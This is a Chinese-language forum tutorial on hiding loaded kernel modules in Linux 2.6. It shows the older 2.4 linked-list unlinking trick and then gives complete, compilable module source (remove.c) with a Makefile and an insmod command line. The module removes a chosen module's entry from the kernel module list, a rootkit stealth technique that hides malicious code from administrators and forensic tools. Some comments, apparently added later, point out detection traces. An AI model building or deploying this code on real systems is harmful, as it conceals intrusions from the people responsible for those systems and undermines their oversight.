
教你怎样隐藏Linux 2.6的内核模块

发布时间:2006-01-26 09:25:37来源:红联作者:thej
  2.6内核与2.4内核相比,有了许多变化,模块部分的实现完全重写,结构也有了一些变化。2.4内核中模块隐藏的方式为:(参考madsys的phrack 61-03)
  
  struct module *p;
  /* 2.4 variant: walk the singly-linked module chain, starting from this
   * module's own entry, and unlink the first node whose name equals str
   * (str is defined outside this fragment). */
  for (p=&__this_module; p->next; p=p->next)
  {
  if (strcmp(p->next->name, str))
  continue;
  /* Only the forward pointer is rewritten: the unlinked module's code and
   * data stay resident, which is where detection starts. */
  p->next=p->next->next; // <-- here it removes that module
  break;
  }
  2.4的module定义为:
  struct module
  {
  unsigned long size_of_struct; /* == sizeof(module) */
  struct module *next;
  const char *name;
  unsigned long size;
  ...
  }
  2.6的module定义为:
  struct module
  {
  enum module_state state;
  /* Member of list of modules */
  struct list_head list; <--- 变成了双向链表
  /* Unique handle for this module */
  char name[MODULE_NAME_LEN];
  ...
  }
  因此使用标准的内核list系列处理函数(不需要再闭门造车了),2.6版的模块隐藏重写为:
  /*
  * FileName: remove.c
  * Author: CoolQ
  * Date: 23:05 2004-9-2
  * Makefile:
  * ---------------- cut here -----------------
  * obj-m += remove.o
  * KDIR:= /lib/modules/$(shell uname -r)/build
  * PWD:= $(shell pwd)
  * default:
  * $(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules
  *----------------- cut here -----------------
  * Compile:
  * [root@coolq tmp]make
  * Usage:
  * [root@coolq tmp]insmod remove.ko mod_name=module_name_to_hide
  */
  #include
  #include
  #include
  #include
  #include
  #include
  /* Name of the module to unlink, supplied on the load command line (see
   * Usage above); defaults to "module". perm 0 means the parameter gets no
   * sysfs entry. Matching is exact (strcmp == 0), first match only. */
  static char *mod_name = "module";
  module_param(mod_name, charp, 0);
  /*
   * Module init: walk the kernel module list from this module's own entry and
   * unlink the first entry whose name exactly matches mod_name.
   * Returns 0 on every path, so this loader module stays loaded (and listed)
   * whether or not a match was found; the not-found case only logs.
   */
  static int remove_init(void)
  {
  struct module *mod_head, *mod_counter;
  struct list_head *p;
  mod_head = &__this_module;
  /* list_for_each() does not visit the head entry itself, so remove.ko can
   * never unlink its own entry -- the loader remains an observable artifact. */
  list_for_each(p, &mod_head->list){
  mod_counter = list_entry(p, struct module, list);
  if(strcmp(mod_counter->name, mod_name) == 0){
  /* Only the list node is unlinked; the target module's code, data and any
   * other kernel references to it are untouched. Nothing records p, and
   * remove_exit() below does nothing, so the entry is never put back --
   * presumably the hidden module cannot be unloaded cleanly afterwards
   * (list_del poisons the node's links in 2.6; confirm for the kernel in use). */
  list_del(p);
  /* Logged without a KERN_* level; the message itself is a kernel-log
   * indicator of what happened and to which module. */
  printk("remove module %s successfully.\n", mod_name);
  return 0;
  }
  }
  printk("Can't find module %s.\n", mod_name);
  return 0;
  }
  /* Module exit: intentionally empty. Nothing unlinked by remove_init() is
   * restored here, so unloading remove.ko does not undo the change. */
  static void remove_exit(void)
  {
  }
  /* Register the init/exit hooks. "Dual BSD/GPL" is a GPL-compatible license
   * string, so loading does not set the proprietary-module taint flag. */
  module_init(remove_init);
  module_exit(remove_exit);
  MODULE_LICENSE("Dual BSD/GPL");